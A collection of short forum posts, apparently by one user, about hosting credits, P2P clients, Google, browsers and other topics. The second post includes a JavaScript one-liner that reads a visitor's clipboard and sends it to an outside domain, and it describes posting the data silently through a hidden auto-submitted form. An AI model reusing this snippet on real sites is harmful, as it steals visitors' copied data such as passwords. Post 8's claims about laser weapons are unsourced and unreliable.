  1. Thanks for the explanations... I just lost 30 points after activating my account This shouldn't happen in my opinion, I don't need my points back but this isn't fair (sorry if if this sounds offensive), I think you should improve your script to avoid this from happening with new members. Anyways, I also read that after I upgrade my account, the "credit system will change" or something; will the hosting credits "bleed" faster? This is kinda a waste of resources in my opinion. Recalculating the credits every 24 hours seems to be more intelligent
  2. There is no need to use this.var content = clipboardData.getData("Text");document.location.replace('http://http://www.afternic.com/domain/evilscript.com; +content); What would redirect you to http://www.afternic.com/domain/evilscript.com And retrieve the value using GET. Or also create a form with hidden values, method=POST and submit it (using setTimeout and form.submit ) There are many ways to silently send the log. Notice from cmatcmextra: Fixed quotes. Please form quote tags in future as follows: [quote=Person or Company Or Site Etc]QUOTED TEXT[/quote] Forms.....
  3. I knew this and other JS "handy" scripts This "exploit" isn't too dangerous , for many reasons:1. They must know what is in the Clipboard, and IF it was a password (1 chance in 10^5 in my case) from which of the billions of websites on net. Additionally, they must know what was your username.2. They can log the clipboard ONCE. Supposing it (the clipboard) is posted to a script and logged, if the "hacker" wanted to log you again would have to redirect the script back to the JS script (or print it directly). But it would log the same thing again if the Clipboard didn't change. This would eventually slow down the victim's connection or crashing him/her computer. Thus, he/she would never visit your site again.3. In order to log your Clipboard for a long time , the exploiter would have to keep you visiting his site. Not an easy thing, and in this case, there is the also point "2".A side note, Firefox doesn't support ANY clipboard command. Aside from accessing its content, you may use JS to change its content. none works with Firefox, and I don't know if this is a good or bad thing. Conclusion: This is an "exploit" that will be hardly used, and even hardly it will succeed. I personally don't worry, also because I don't copy and paste my passwords.
  4. I can't understand this credits system well... 1. If I get the 1st package that costs 10 points, after admin approval, account creation and etc will they disappear (the points)?2. If I upgrade to the 2nd package (after getting the 1st) will I lose 20 or 30 points?3. The points are supposed to be the number of days I can remain inactive; so if I upgrade to the 2nd package this is still valid, right? This would mean the only cost of upgrading would be the 20 (or 30) points, right? Thanks
  5. I just read a topic explaining why there is no Edit button. Will you reconsider if I modify it so it will recalculate the points upon edit?I am a PHP programmer, I think I could help
  6. I am sorry if this has been suggested before, but it would be good if you allowed the users to edit their posts... I don't feel comfortable posting again because I forgot something or wanted to change something
  7. I have a little brother that plays Neopets. It's too infantile in my opinion, the worst thing is that they "copy" games and rename them. There are copies of all good and old classics, or even new games... Other they I saw him playing game called "whack the kass" or something like this, it's a stupid copy of Yetisports part 1!! They should give credits to the original creators
  8. No, it's not (I mean, it's hard to hit the plane, the problem is to take it down). I saw videos - Northrop Grumman's Tactical High Energy Laser (THEL) shooting down mortar rounds, rockets and etc. http://forums.xisto.com/no_longer_exists/ It's impressive. You can fry missiles because they explode "easily", it would be a little harder to hit a plane. This is too "Hollywoodian" You may not know, but todays most advanced laser weapons belong to China. For example, some targeting system used by the Iraqis were supplied by China. There is also a Chinese tank (Type98) that will shoot a laser on enemy tanks aming at it; which blinds the enemy, laser cannons, and other laser weapons.
  9. I was going to say "Stupid Microsoft, now they are losing the competition they copy Google", but you changed my mind, what you said is pretty reasonable. But you can't deny that Google's maps/earth are way better than MSN earth, especially satellite images from countries other than US.
  10. three computers here: this one I am using, a notebook and an old PC.in my school there are, lets say 200 computers...
  11. Read this article, it was written by Microsoft specialists: http://www.bearcave.com/misl/misl_tech/msdrm/darknet.htm Kazaa: It was good before, but now it's filled with virus and it's hard to find files you want. When you eventually find them and start downloading, they will disappear in the middle of the download. Emule: Its loaded with files and you can get a nice speed. The only problem is that you must build credits so you can skip queue positions... IRC: Yes, it's the fastest but finding files is not an easy task. Also, it don't have proper identification of files, making it easier to download fakes, and worse, it's loaded with hackers... A very dangerous network IMO. I forgot to tell about BitTorrent. BT's biggest problem is the Upload/Download ratio. Yes, I know a lot of people leeching only hurt the network, but most of the BT trackers require you to maintain a 1:1 or better share ratio, what is hard to achieve, especially because most of the ISP give you a much higher download speed (than upload speed). also, this upload-download "switching" can kill your HD. You know the harddisk is a mechanic device, so it can fry relatively easily. Notice from cmatcmextra: No edit button as it was abused. Fixed quote tags and merging...
  12. the first clients I used were Shareaza (because I used it for Gnutella and Gnutella2) and the original one (the first time I used a BT client), but I didn't like it - my computer used to crash when I used it; I am using now Azureus because it got a nice interface and allow you to choose which files you want to download or not - which I use very oftenly
  13. When I went to the US a friend of mine asked me to buy a PSP... So I bought it and tested it... There are some points to consider, the most important is that it have it's own format (the UMD) making it harder to use pirate games (I don't know if there is any way to circumvent this)...Also, it's hella expensive and got a small screen and the graphics look like 64bit consoles; I would never buy one for me
  14. Are you sure you know what you are talking about?Dreamweaver does the layout only as far as I know, it's like using normal HTML. Zend studio is just a modified text editor to highlight php, give you hints and etc. If you want one of these, use PHP Designer 2005 (post above) There is no WYSIWYG editor for PHP. However, you can install Apache on your own PC so it will be easier to test your PHP programs... Best of luck
  15. Agreed. Microsoft announced this new Internet Explorer - trying - to stop Firefox's growth. It's still the same lame browser; and they are going to copy Firefox's best features like they did with Netscape to win the competition. But it's different now, I don't know if people will be fooled again... Also, if the serious <<removed>> security holes aren't fixed, I won't use it again. Notice from BuffaloHELP: Censored blasphemy. One's anger can be expresses without using expletive words. Thank you.
  16. stupid charge. google is FREE; how could they earn profit?oh yeah, adverts, but I don't think linking to their images is "advertising".
  17. everything is black for me too the google earth is better
  18. It's not technical, use may use or not. Google's strongest point is being simple yet very useful IMO... The advanced functions are easy to remember in spite of being advanced ... And they also have some smart functions, like when you search a film they will show info, and you can type a location and get showtimes... it's astounding
  19. Hey, whats the matter with Google toolbar? It's nice and very useful... It got Popup blocker, auto fill and other handy features.but anyways I think using Gmail itself to search the emails is good enough
  20. I don't own any FTP server, but I use CuteFTP when I am home and net2ftp when I am away to access FTP servers
